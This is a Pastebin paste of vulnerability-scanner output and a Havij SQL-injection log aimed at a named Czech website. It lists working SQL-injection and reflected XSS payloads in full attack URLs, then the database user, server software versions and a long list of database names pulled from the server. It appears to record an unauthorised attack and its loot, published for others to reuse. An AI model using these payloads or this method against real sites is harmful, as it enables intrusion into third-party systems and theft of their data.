API tools faq
paste
Advertisement
sroub3k

exekutorbelasta.cz

sroub3k
Nov 21st, 2011
794
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.76 KB | None | 0 0
raw download clone embed print report
  1. Boolean Based SQL Injection
  2.  
  3. Severity : Critical
  4. Confirmation : Confirmed
  5. Detection Accuracy :
  6. Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=-1 OR 17-7=10
  7. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  8. Parameter Name: id
  9. Parameter Type: Querystring
  10. Attack Pattern: -1 OR 17-7=10
  11.  
  12. |||
  13.  
  14. [High Possibility] SQL Injection
  15.  
  16. Severity : Critical
  17. Confirmation : Confirmed
  18. Detection Accuracy :
  19. Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=%27
  20. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  21. Parameter Name: id
  22. Parameter Type: Querystring
  23. Attack Pattern: %27
  24.  
  25. |||
  26.  
  27. XSS - Cross-site Scripting
  28.  
  29. Severity : Important
  30. Confirmation : Confirmed
  31. Detection Accuracy :
  32. Vulnerable URL : http://www.exekutorbelasta.cz/form_movite.php?id_form=157'"--></style></script><script>alert(0x0001E7)</script>
  33. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  34. Parameter Name: id_form
  35. Parameter Type: Querystring
  36. Attack Pattern: 157'"--></style></script><script>alert(0x0001E7)</script>
  37. -
  38. Severity : Important
  39. Confirmation : Confirmed
  40. Detection Accuracy :
  41. Vulnerable URL : http://www.exekutorbelasta.cz/form_movite.php
  42. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  43. Parameter Name: e_mail
  44. Parameter Type: Post
  45. Attack Pattern: '"--></style></script><script>alert(0x000265)</script>
  46. -
  47. Severity : Important
  48. Confirmation : Confirmed
  49. Detection Accuracy :
  50. Vulnerable URL : http://www.exekutorbelasta.cz/form_movite.php
  51. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  52. Parameter Name: fax
  53. Parameter Type: Post
  54. Attack Pattern: '"--></style></script><script>alert(0x000269)</script>
  55.  
  56. |||
  57.  
  58. Database User Has Admin Privileges
  59.  
  60. Severity : Important
  61. Confirmation : Confirmed
  62. Detection Accuracy :
  63. Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=-1 OR 17-7=10
  64. Vulnerability Classifications: OWASP A6 CWE-16
  65. Parameter Name: id
  66. Parameter Type: Querystring
  67. Attack Pattern: -1 OR 17-7=10
  68.  
  69. |||
  70.  
  71. PHP Version Disclosure
  72.  
  73. Severity : Low
  74. Confirmation : Confirmed
  75. Detection Accuracy :
  76. Vulnerable URL : http://www.exekutorbelasta.cz/
  77. Vulnerability Classifications: PCI 6.5.6 OWASP A6
  78. Extracted Version: PHP/5.2.0-8+etch11
  79.  
  80. |||
  81.  
  82. Database Error Message
  83.  
  84. Severity : Low
  85. Confirmation : Confirmed
  86. Detection Accuracy :
  87. Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=%27
  88. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
  89. Parameter Name: id
  90. Parameter Type: Querystring
  91. Attack Pattern: %27
  92.  
  93. |||
  94.  
  95. Havij log.
  96.  
  97.  
  98. Target: http://www.exekutorbelasta.cz/show_movitosti.php?id=-1 OR 17-7=10
  99. Web Server: Apache
  100. Powered-by: PHP/5.2.0-8+etch11
  101. DB Server: MySQL
  102. Current User: radek@localhost
  103. Sql Version: 5.0.32-Debian_7etch12
  104. Current DB: belasta
  105. System User: radek@localhost
  106. Installation dir: /usr/
  107.  
  108. Data Bases: information_schema
  109. agroteam
  110. akce
  111. ankety
  112. asean
  113. autocentrum1
  114. avscr
  115. bauer
  116. bazar
  117. belasta
  118. belgbau
  119. beryreisen
  120. ceskakariera
  121. ceskebazary
  122. ceskebazary2
  123. ceskestavby
  124. ceskyinternet
  125. ceskyinternet_firma
  126. ceskyseznam
  127. ceskyslovnik
  128. ciselniky_adresy
  129. ciselniky_cizi
  130. clanky
  131. couf
  132. ctecka
  133. detskysvet
  134. diskuse
  135. dstechnik
  136. dstechnik2005
  137. dstechnik_obchod
  138. dstechnik_test
  139. edovolena
  140. edovolena-old
  141. efotbal
  142. emucouf
  143. fotogalerie
  144. ft
  145. gastro
  146. gepardsport
  147. gkcb
  148. homestar
  149. hotelypensiony
  150. importy
  151. inpress
  152. intext
  153. ispell
  154. italskynabytek
  155. ivo
  156. jcdivadlo
  157. jcdivadlo2
  158. jckpu
  159. klienti
  160. komplex
  161. konik
  162. kontaktgroup
  163. kontroly
  164. lost+found
  165. management
  166. margarita
  167. montplast
  168. mysql
  169. navstevnici
  170. neptun
  171. neptun2
  172. neptunold
  173. novinkysortiment
  174. obce
  175. pensionnovak
  176. pohony
  177. pole
  178. poptavky
  179. ppzelec
  180. produkty
  181. pujcovna
  182. radek
  183. reality
  184. reate
  185. reklama
  186. reklama_stavby
  187. ridingwasps
  188. rostliny
  189. rozkrock
  190. saggita
  191. seacom
  192. seznamka
  193. seznamka_a1
  194. she
  195. shop
  196. shop2
  197. slovnikpojmu
  198. sortimentnovinky
  199. sport
  200. stajdita
  201. staroceskydvur
  202. stat_2003
  203. stat_2003_akce
  204. stat_2003_bazar
  205. stat_2003_clanky
  206. stat_2003_devprojekty
  207. stat_2003_firmy
  208. stat_2003_fotoinspirace
  209. stat_2003_pujcovna
  210. stat_2003_shop
  211. stat_2003_typovedomy
  212. stat_2003_zbozi
  213. stat_2004
  214. stat_2004_akce
  215. stat_2004_bazar
  216. stat_2004_clanky
  217. stat_2004_devprojekty
  218. stat_2004_firmy
  219. stat_2004_fotoinspirace
  220. stat_2004_pujcovna
  221. stat_2004_shop
  222. stat_2004_typovedomy
  223. stat_2004_zbozi
  224. stat_2005
  225. stat_2005_akce
  226. stat_2005_bazar
  227. stat_2005_clanky
  228. stat_2005_devprojekty
  229. stat_2005_firmy
  230. stat_2005_fotoinspirace
  231. stat_2005_pujcovna
  232. stat_2005_shop
  233. stat_2005_typovedomy
  234. stat_2005_zbozi
  235. stat_2006
  236. stat_2006_akce
  237. stat_2006_bazar
  238. stat_2006_clanky
  239. stat_2006_devprojekty
  240. stat_2006_firmy
  241. stat_2006_fotoinspirace
  242. stat_2006_pujcovna
  243. stat_2006_shop
  244. stat_2006_typovedomy
  245. stat_2006_zbozi
  246. stat_2007
  247. stat_2007_akce
  248. stat_2007_bazar
  249. stat_2007_clanky
  250. stat_2007_devprojekty
  251. stat_2007_firmy
  252. stat_2007_fotoinspirace
  253. stat_2007_pujcovna
  254. stat_2007_shop
  255. stat_2007_typovedomy
  256. stat_2007_zbozi
  257. stat_2008
  258. stat_2008_akce
  259. stat_2008_bazar
  260. stat_2008_clanky
  261. stat_2008_devprojekty
  262. stat_2008_firmy
  263. stat_2008_fotoinspirace
  264. stat_2008_pujcovna
  265. stat_2008_shop
  266. stat_2008_typovedomy
  267. stat_2008_zbozi
  268. stat_2009
  269. stat_2009_akce
  270. stat_2009_bazar
  271. stat_2009_clanky
  272. stat_2009_devprojekty
  273. stat_2009_firmy
  274. stat_2009_fotoinspirace
  275. stat_2009_pujcovna
  276. stat_2009_shop
  277. stat_2009_typovedomy
  278. stat_2009_zbozi
  279. stat_2010
  280. stat_2010_akce
  281. stat_2010_bazar
  282. stat_2010_clanky
  283. stat_2010_devprojekty
  284. stat_2010_firmy
  285. stat_2010_fotoinspirace
  286. stat_2010_pujcovna
  287. stat_2010_shop
  288. stat_2010_typovedomy
  289. stat_2010_zbozi
  290. stat_2011
  291. stat_2011_akce
  292. stat_2011_bazar
  293. stat_2011_clanky
  294. stat_2011_devprojekty
  295. stat_2011_firmy
  296. stat_2011_fotoinspirace
  297. stat_2011_pujcovna
  298. stat_2011_shop
  299. stat_2011_typovedomy
  300. stat_2011_zbozi
  301. stat_2012
  302. stat_2012_akce
  303. stat_2012_bazar
  304. stat_2012_clanky
  305. stat_2012_devprojekty
  306. stat_2012_firmy
  307. stat_2012_fotoinspirace
  308. stat_2012_pujcovna
  309. stat_2012_shop
  310. stat_2012_typovedomy
  311. stat_2012_zbozi
  312. stat_2013
  313. stat_2013_akce
  314. stat_2013_bazar
  315. stat_2013_clanky
  316. stat_2013_devprojekty
  317. stat_2013_firmy
  318. stat_2013_fotoinspirace
  319. stat_2013_pujcovna
  320. stat_2013_shop
  321. stat_2013_typovedomy
  322. stat_2013_zbozi
  323. stat_2014
  324. stat_2014_akce
  325. stat_2014_bazar
  326. stat_2014_clanky
  327. stat_2014_devprojekty
  328. stat_2014_firmy
  329. stat_2014_fotoinspirace
  330. stat_2014_pujcovna
  331. stat_2014_shop
  332. stat_2014_typovedomy
  333. stat_2014_zbozi
  334. stat_2015
  335. stat_2015_akce
  336. stat_2015_bazar
  337. stat_2015_clanky
  338. stat_2015_devprojekty
  339. stat_2015_firmy
  340. stat_2015_fotoinspirace
  341. stat_2015_pujcovna
  342. stat_2015_shop
  343. stat_2015_typovedomy
  344. stat_2015_zbozi
  345. stat_hotely_2006
  346. stat_hotely_2007
  347. stat_hotely_2008
  348. stat_hotely_2009
  349. stat_hotely_2010
  350. stat_kariera_2007
  351. stat_kariera_2008
  352. stat_kariera_2009
  353. stat_kariera_2010
  354. stat_seznam_2009
  355. stat_seznam_2010
  356. stat_stavby_2004
  357. stat_stavby_2005
  358. stat_stavby_2006
  359. stat_stavby_2007
  360. stat_stavby_2008
  361. stat_stavby_2009
  362. stat_stavby_2010
  363. stat_summary
  364. statistika
  365. statistiky
  366. statistiky2
  367. statistiky_test
  368. temp
  369. test
  370. test2
  371. test_db1
  372. test_db2
  373. testuser
  374. therme
  375. top_obchod
  376. toyotacb
  377. trimcon
  378. uniprojekta
  379. urlci
  380. uzivatele
  381. vaseparfemy
  382. vasezajezdy
  383. verba
  384. vratny
  385. vyvoj
  386. wb0015
  387. willow
  388. xj
  389. zazvorkova
  390. zdeco
  391. zemesveta
  392. zeppelin
  393.  
  394. |||
  395.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!